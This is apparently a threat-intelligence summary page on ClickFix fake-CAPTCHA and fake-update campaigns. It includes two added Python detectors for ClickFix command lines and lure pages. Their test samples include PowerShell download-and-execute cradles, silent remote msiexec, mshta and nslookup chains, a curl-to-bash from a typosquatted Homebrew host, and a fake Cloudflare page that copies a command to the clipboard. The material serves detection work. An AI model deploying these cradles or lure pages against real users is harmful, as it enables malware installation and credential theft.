Mallory

ClickFix Social-Engineering Technique Used to Trick Users Into Running Malware

clickfix, malicious msi, social engineering, clipboard hijacking, cryptostealer, seo poisoning, fake captcha, browser update prompt, chrome extension, credential theft, botnet, github redirect, typosquatting, loader, staged payload
Updated March 2, 2026 at 07:07 PM. 2 sources.
Multiple reports highlighted ClickFix, a social-engineering technique that uses fake verification or update prompts to coerce users into manually executing attacker-supplied commands, as a recurring initial-access method in recent malware activity; because the victim types or pastes the command themselves, the chain never trips the controls that inspect downloaded files. In the OCRFix botnet campaign, victims were lured to a typosquatted site impersonating Tesseract OCR (a tesseract-ocr[.]com lookalike) via SEO poisoning and, reportedly, LLM poisoning (chatbot recommendations pointing users to the malicious site). The site presented a fake CAPTCHA that silently copied an obfuscated PowerShell command to the clipboard and instructed the user to paste it into PowerShell; the command retrieved a malicious MSI (98166e51.msi) from opsecdefcloud[.]com, after which victims were redirected to the legitimate GitHub project to reduce suspicion. The loader then queried a BNB TestNet smart contract for its C2 details, an EtherHiding technique (instructions hosted on a public blockchain) that makes takedown and disruption harder.

A separate investigation described a Chrome extension supply-chain compromise of QuickLens – Search Screen with Google Lens (7,000+ users): attackers acquired the extension and shipped an update that embedded malicious scripts and requested elevated permissions, enabling credential and cryptocurrency theft and staged payload delivery. The same campaign incorporated a ClickFix flow that masqueraded as a legitimate browser update to trick users into executing malicious code. The remaining sources in this set covered other topics: an AiTM phishing-kit attribution case study (focused on reverse-proxy phishing infrastructure rather than ClickFix), research on Funnull/Fangneng CDN as cybercrime-enabling infrastructure and related supply-chain activity, and Zscaler reporting on Dust Specter APT targeting Iraqi government officials with password-protected RAR delivery and custom malware modules; none of these were primarily about ClickFix.

Related Stories

ClickFix Social Engineering Drives Multi-Platform Malware Delivery

Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.

3 weeks ago
ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution

A **ClickFix**-style malware campaign has been observed using **fake CAPTCHA** pages on compromised websites to trick users into **manually executing** malicious commands, enabling initial access while evading controls that focus on downloaded files. In the reported activity, victims are prompted to copy a **PowerShell** command and run it themselves; the script then downloads additional stages from attacker infrastructure (including `91.92.240.219`), verifies user interaction by checking clipboard activity, and proceeds through a multi-stage infection chain. The payload is an **information stealer** targeting data from **25+ web browsers**, cryptocurrency wallets (e.g., *MetaMask*), and enterprise VPN configurations, with checks for virtualized environments and security tooling prior to exfiltration. Separately reported threat activity in the same time window includes **UnsolicitedBooker** targeting Central Asian telecoms with phishing-delivered backdoors (**LuciDoor** and **MarsSnake**) and **APT28** running *Operation MacroMaze*, which uses weaponized Office documents and `INCLUDEPICTURE` fields pointing to `webhook[.]site` URLs as a tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions an evolution of ClickFix where an initial command uses `nslookup` and parses the response for execution, but it is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign; a malware newsletter roundup is likewise a link collection and does not add specific, corroborating details about the ClickFix CAPTCHA infostealer operation.

3 weeks ago
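Every chain summarized above ends the same way: a human pastes or types a one-liner that fetches and runs remote content (the OCRFix fake CAPTCHA with its obfuscated PowerShell, the cert.pl Win+R paste, the Homebrew lookalike whose only tell is the raw.homabrews.org host, the Matanbuchus silent msiexec install, and the nslookup-based variant from the weekly briefing). The triage script below is an added example written for this page, not code from CERT Polska or any other cited vendor. It scores command lines as they would appear in process-creation telemetry or Run-dialog history, first decoding any PowerShell -EncodedCommand blob, and it checks curl-to-shell installers against an allowlist of hosts. The sample command lines are constructed: the 203.0.113.x addresses are TEST-NET placeholders, while 91.92.240.219, the 98166e51.msi filename and raw.homabrews.org are taken from the summaries on this page. The allowlist, the indicator weights and the tier thresholds are assumptions to tune per environment.

```python
"""Triage of ClickFix-style command lines (added example, not vendor code).

Input: a command line as logged by process-creation telemetry (Sysmon event 1,
Security event 4688), recovered from the RunMRU registry key, or taken from a
macOS shell history.  Output: a tier plus the indicators that fired.
"""
import base64
import re

# Assumption: the only host a curl-to-shell installer is expected to fetch from.
TRUSTED_INSTALLER_HOSTS = {"raw.githubusercontent.com"}
SUSPECT_AT, REVIEW_AT = 6, 3          # assumed tier thresholds

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SHELL_PIPE_RE = re.compile(r"\|\s*(?:ba)?sh\b|\$\(\s*curl", re.I)

# (indicator, weight, pattern), applied to the command line after decoding.
INDICATORS = [
    ("hidden_window", 2, r"-w(?:indowstyle)?\s+h(?:idden)?\b"),
    ("policy_bypass", 1, r"-e(?:xecutionpolicy|p)?\s+bypass\b"),
    ("encoded_command", 2, ENC_RE.pattern),
    ("download_cradle", 2, r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|"
                           r"net\.webclient|curl|wget|start-bitstransfer)\b"),
    ("in_memory_exec", 2, r"\b(?:iex|invoke-expression)\b|" + SHELL_PIPE_RE.pattern),
    ("silent_msi_install", 2, r"\bmsiexec\b.*\s/q"),
    ("remote_silent_msi", 3, r"\bmsiexec\b.*https?://.*\s/q"),
    ("mshta_remote", 4, r"\bmshta\b.*https?://"),
    ("nslookup_txt_chain", 3, r"\bnslookup\b.*-(?:q|type|querytype)=txt"),
    ("exec_of_command_output", 3, r"\bfor\s+/f\b.*\bdo\s+%"),
    # Lure pages commonly append a comment so the pasted line reads as a verification step.
    ("verification_comment", 2, r"#.*(?:not a robot|verif|captcha)"),
]
INDICATORS = [(name, weight, re.compile(pat, re.I)) for name, weight, pat in INDICATORS]


def expand_encoded(cmd):
    """Append the plaintext of any -EncodedCommand blob (base64 of UTF-16LE)."""
    out = cmd
    for blob in ENC_RE.findall(cmd):
        try:
            out += " " + base64.b64decode(blob).decode("utf-16-le")
        except ValueError:                       # bad base64 or not UTF-16
            out += " <undecodable-encodedcommand>"
    return out


def triage(cmd):
    """Return (tier, score, [indicator names]) for one command line."""
    text = expand_encoded(cmd)
    hits = [(name, weight) for name, weight, rx in INDICATORS if rx.search(text)]
    hosts = [h.lower() for h in URL_RE.findall(text)]
    if hosts:
        hits.append(("remote_url", 1))
        if any(IPV4_RE.match(h) for h in hosts):
            hits.append(("ip_literal_url", 1))
        if SHELL_PIPE_RE.search(text):           # fetched content goes straight into a shell
            if all(h in TRUSTED_INSTALLER_HOSTS for h in hosts):
                hits.append(("allowlisted_installer_host", -3))
            else:
                hits.append(("untrusted_installer_host", 3))
    score = sum(w for _, w in hits)
    tier = "suspect" if score >= SUSPECT_AT else "review" if score >= REVIEW_AT else "benign"
    return tier, score, [name for name, _ in hits]


def _encoded(ps):
    """Encode a PowerShell one-liner the way a lure page hides it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed samples; see the lead-in for which identifiers come from the page.
SAMPLES = {
    "ocrfix_encoded": "powershell.exe -w hidden -ep bypass -enc " + _encoded(
        "iwr http://203.0.113.10/98166e51.msi -OutFile $env:TEMP\\x.msi; msiexec /i $env:TEMP\\x.msi /qn"),
    "captcha_run_dialog": "powershell -w h -c \"iex (iwr 'http://91.92.240.219/ver.php').Content\" "
                          "# I am not a robot - Verification ID: 4821",
    "silent_remote_msi": "msiexec /i http://203.0.113.77/update.msi /qn",
    "nslookup_txt": "cmd /c for /f \"tokens=*\" %a in ('nslookup -q=txt verify.example.net') do %a",
    "homebrew_lookalike": "/bin/bash -c \"$(curl -fsSL https://raw.homabrews.org/install.sh)\"",
    "homebrew_genuine": "/bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\"",
    "unsigned_script_fetch": "powershell -c \"iwr http://203.0.113.9/tool.ps1 -OutFile tool.ps1\"",
    "admin_benign": "powershell -NoProfile -Command Get-ChildItem C:\\Users",
}


def triage_all(samples=SAMPLES):
    """Map each sample name to its tier."""
    return {name: triage(cmd)[0] for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        tier, score, hits = triage(cmd)
        print(f"{tier:8} {score:3}  {name}: {', '.join(hits)}")
```

The genuine and lookalike Homebrew one-liners fire exactly the same generic indicators; only the host allowlist separates them, which is the point of that story. Encoded commands are decoded before matching so that `-w hidden -enc ...` cannot hide a download cradle from the pattern list.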
ClickFix Social-Engineering Lures Deliver Multi-Stage Windows Malware via Browser Extensions and Compromised WordPress Sites

Threat researchers reported continued evolution and operationalization of **ClickFix**-style social engineering, where victims are tricked into manually executing attacker-supplied commands via the Windows Run dialog. Huntress described a new variant dubbed **CrashFix**, attributed to **KongTuke**, which uses a **malicious browser extension** to display a fake “browser stopped abnormally” security warning and a bogus “scan” flow; the extension silently places a **PowerShell** command on the clipboard, disguised as a legitimate repair action, and instructs the user to paste-and-run it, leading to code execution. Rapid7 Labs separately documented a large-scale campaign in which an unidentified actor compromises legitimate **WordPress** sites to inject a ClickFix implant that impersonates a **Cloudflare human verification (CAPTCHA)** challenge. The operation has affected **250+** infected sites across **12+ countries** and delivers a **multi-stage, mostly in-memory** malware chain (obfuscated JavaScript → PowerShell stagers → in-memory loaders/shellcode) aimed at stealing **credentials and digital wallets** from Windows systems, enabling downstream financial theft and potential follow-on intrusion using harvested credentials.

1 week ago
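The Rapid7 WordPress campaign and the CrashFix extension both rely on page-side JavaScript to put the command on the clipboard while the visible text tells the user to paste it. The scanner below is an added example written for this page, not Rapid7's, Huntress's or any other cited vendor's code. It inspects served HTML for that combination: a clipboard write in an inline script or an on* handler, plus a recoverable string that looks like a shell or PowerShell command, including strings hidden behind atob() or String.fromCharCode(), and it records whether the visible text carries the usual "verify you are human / press Win+R" copy. The three pages are constructed for the example (the 91.92.240.219 address comes from the summaries above; 203.0.113.5 is a TEST-NET placeholder), and the indicator regexes and lure-phrase list are assumptions.

```python
"""Scan served HTML for a ClickFix lure (added example, not vendor code).

Flags pages whose inline script or on* handler writes to the clipboard and
whose recoverable string literals (plain, atob()-encoded, or built with
String.fromCharCode) look like a shell/PowerShell command.
"""
import base64
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
HANDLER_RE = re.compile(r"\son\w+\s*=\s*([\"'])(.*?)\1", re.I | re.S)
CLIP_WRITE_RE = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|clipboardData\.setData\s*\(|"
    r"execCommand\s*\(\s*[\"']copy[\"']\s*\)", re.I)
STR_LIT_RE = re.compile(r"""([\"'])((?:\\.|(?!\1).)*)\1""", re.S)
ATOB_RE = re.compile(r"atob\s*\(\s*([\"'])([A-Za-z0-9+/=]+)\1\s*\)")
FROMCHAR_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
# Assumed phrase list for the visible lure text.
LURE_TEXT_RE = re.compile(
    r"verify you are human|not a robot|ray id|press\s+win(?:dows)?\s*\+\s*r|stopped abnormally", re.I)
CMD_RE = re.compile(
    r"\b(?:powershell|pwsh|mshta|msiexec|cmd(?:\.exe)?\s*/c|curl\b.*\|\s*(?:ba)?sh)\b", re.I)


def recover_strings(code):
    """Return every string the page could be handing to a clipboard API."""
    found = []
    for _, blob in ATOB_RE.findall(code):
        try:
            found.append(base64.b64decode(blob).decode("utf-8", "replace"))
        except ValueError:                       # not valid base64
            pass
    for nums in FROMCHAR_RE.findall(code):
        found.append("".join(chr(int(n)) for n in nums.split(",") if n.strip()))
    found.extend(s for _, s in STR_LIT_RE.findall(code))
    return found


def scan_page(html):
    """Classify one HTML document; returns a dict with verdict and evidence."""
    code = SCRIPT_RE.findall(html) + [body for _, body in HANDLER_RE.findall(html)]
    joined = "\n".join(code)
    clipboard_write = bool(CLIP_WRITE_RE.search(joined))
    command = next((s for s in recover_strings(joined) if CMD_RE.search(s)), None)
    visible = re.sub(r"<script\b.*?</script>|<[^>]+>", " ", html, flags=re.I | re.S)
    lure_text = bool(LURE_TEXT_RE.search(visible))
    if clipboard_write and command:
        verdict = "clickfix_lure"
    elif lure_text:
        verdict = "review"
    elif clipboard_write:
        verdict = "clipboard_use"
    else:
        verdict = "clean"
    return {"verdict": verdict, "clipboard_write": clipboard_write,
            "lure_text": lure_text, "command": command}


def _b64(s):
    """Encode a one-liner the way a lure hides it from a casual view-source."""
    return base64.b64encode(s.encode()).decode()


def _fcc(s):
    """Render a string as a String.fromCharCode argument list."""
    return ",".join(str(ord(c)) for c in s)


# Constructed page 1: fake Cloudflare check injected into a compromised site.
CAPTCHA_CMD = ('powershell -w hidden -c "iex (iwr http://91.92.240.219/ver.php).Content" '
               '# I am not a robot - Verification ID: 4821')
FAKE_CLOUDFLARE = f"""<html><body><div id="cf"><h2>example.com</h2>
<p>Verify you are human by completing the action below.</p>
<p>1. Press Windows + R &nbsp; 2. Press CTRL + V &nbsp; 3. Press Enter</p>
<button onclick="verify()">I'm not a robot</button><p>Ray ID: 8f1c2d3e4a5b6c7d</p></div>
<script>
function verify() {{
  var p = atob("{_b64(CAPTCHA_CMD)}");
  navigator.clipboard.writeText(p);
  document.getElementById("cf").innerText = "Verification complete";
}}
</script></body></html>"""

# Constructed page 2: CrashFix-style "repair" prompt, command built from char codes.
REPAIR_CMD = "mshta https://203.0.113.5/repair.hta"
CRASHFIX_REPAIR = f"""<html><body><div class="warn">Browser stopped abnormally. Click to run the repair.</div>
<script>
document.querySelector('.warn').addEventListener('click', function () {{
  var t = document.createElement('textarea');
  t.value = String.fromCharCode({_fcc(REPAIR_CMD)});
  document.body.appendChild(t); t.select(); document.execCommand('copy'); t.remove();
}});
</script></body></html>"""

# Constructed page 3: a legitimate copy-to-clipboard button.
COUPON_BUTTON = """<html><body><p>Your coupon code:</p><code id="c">SPRING25</code>
<button onclick="navigator.clipboard.writeText(document.getElementById('c').innerText)">Copy code</button>
<script>console.log('ready');</script></body></html>"""


if __name__ == "__main__":
    for name, page in [("fake_cloudflare", FAKE_CLOUDFLARE),
                       ("crashfix_repair", CRASHFIX_REPAIR),
                       ("coupon_button", COUPON_BUTTON)]:
        print(name, scan_page(page))
```

Clipboard use alone is not evidence (the coupon button is exactly what a shop does); the verdict turns on recovering a command-shaped string from whatever the script is feeding to the clipboard, so the decoders are the part worth extending when a campaign switches obfuscation.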